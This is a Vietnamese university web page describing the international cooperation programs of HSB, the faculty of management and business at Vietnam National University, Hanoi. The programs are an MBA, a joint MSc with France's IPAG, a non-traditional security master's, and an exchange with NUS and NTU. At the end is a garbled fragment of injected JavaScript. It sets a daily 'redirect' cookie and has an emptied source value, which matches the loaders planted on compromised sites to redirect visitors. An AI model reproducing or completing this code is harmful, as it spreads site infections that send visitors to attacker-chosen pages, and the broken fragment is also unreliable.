HỢP TÁC PHÁT TRIỂN

Khoa Quản trị và Kinh doanh (HSB) đã thiết lập quan hệ hợp tác quốc tế với nhiều trường đại học và cơ sở giáo dục và đào tạo đến từ các châu lục trên thế giới như Hoa Kỳ, châu Âu, châu Á và châu Úc.

Ngay từ khi thành lập năm 1995, HSB đã chính thức đặt mối quan hệ với trường giảng dạy về quản trị kinh doanh (MBA) đầu tiên trên thế giới – Tuck School of Business at Dartmouth, Hoa Kỳ. Từ đó tới nay, các hoạt động hợp tác quốc tế luôn được chú trọng phát triển và diễn ra với nhiều hình thức, cấp độ và nội dung như trao đổi sinh viên và giảng viên, hợp tác nghiên cứu, liên kết đào tạo quốc tế.

Hiện tại, HSB có 04 chương trình đào tạo có hợp tác chính thức với các đối tác quốc tế từ Hoa Kỳ, Úc, Pháp và Singapore.

1. Chương trình Thạc sĩ Quản trị Kinh doanh (HSB-MBA)

1Chương trình đào tạo Thạc sĩ Quản trị Kinh doanh (Master in Business Administration, HSB-MBA) được thực hiện bằng tiếng Anh do Đại học Quốc gia Hà Nội cấp bằng. Chương trình được HSB tổ chức đào tạo thành công từ năm 2002 với sự hợp tác của các giảng viên đến từ trường hàng đầu thế giới như Đại học Queensland – Australia, University of North Carolina – USA, v.v.

Thông tin chi tiết về chương trình Thạc sĩ Quản trị Kinh doanh (HSB-MBA).

2. Chương trình Thạc sĩ liên kết quốc tế IPAG (HSB-MBM)

2Chương trình đào tạo Thạc sĩ Khoa học Quản trị Kinh doanh (Master of Science in Business Management – HSB-MBM) là chương trình đào tạo liên kết quốc tế giữa HSB và Trường kinh doanh IPAG (Cộng hòa Pháp) do IPAG cấp bằng, được ĐHQGHN cấp phép và được Cục Khảo thí và Kiểm định Chất lượng Giáo dục, Bộ Giáo dục và Đào tạo Việt Nam công nhận văn bằng.

Thông tin chi tiết về chương trình Thạc sĩ liên kết quốc tế IPAG (HSB-MBM).

 

3. Chương trình Thạc sĩ Quản trị An ninh Phi truyền thống (MNS)

3Chương trình đào tạo Thạc sĩ Quản trị An ninh Phi truyền thống (Master in Manegement of Non-Traditional Security, MNS) do Đại học Quốc gia Hà Nội cấp bằng và có sự hợp tác của các giảng viên đến từ trường hàng đầu thế giới (Queensland University, IPAG, UN Univesity… ) là một chương trình đào tạo mới, có tính liên ngành cao và tiên phong trong khu vực Đông Nam Á đào tạo về quản trị các vấn đề an ninh phi truyền thống.

Thông tin chi tiết về chương trình Thạc sĩ Quản trị An ninh Phi truyền thống (MNS).

4. Chương trình “Khám phá Việt Nam”

4Chương trình được thiết kế như một chương trình trao đổi nhằm giúp sinh viên quốc tế muốn tìm hiểu về kinh tế, xã hội và văn hóa Việt Nam thông qua các hoạt động đa dạng như seminar, thực địa và các hoạt động tương tác khác. Hiện tại, chương trình này đang được triển khai với hai trường đại học hàng đầu của Singapore là Đại học Quốc gia Singapore (National University of Singapore – NUS) và Đại học Công nghệ Nanyang Singapore (Nanyang Technology Singapore – NTU) dưới tên gọi “GEM Discoverer Prelude Hanoi Program” với độ dài khoảng 02 tuần và đã được công nhận tín chỉ trong chương trình đào tạo cử nhân chính thức của NUS và NTU.

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}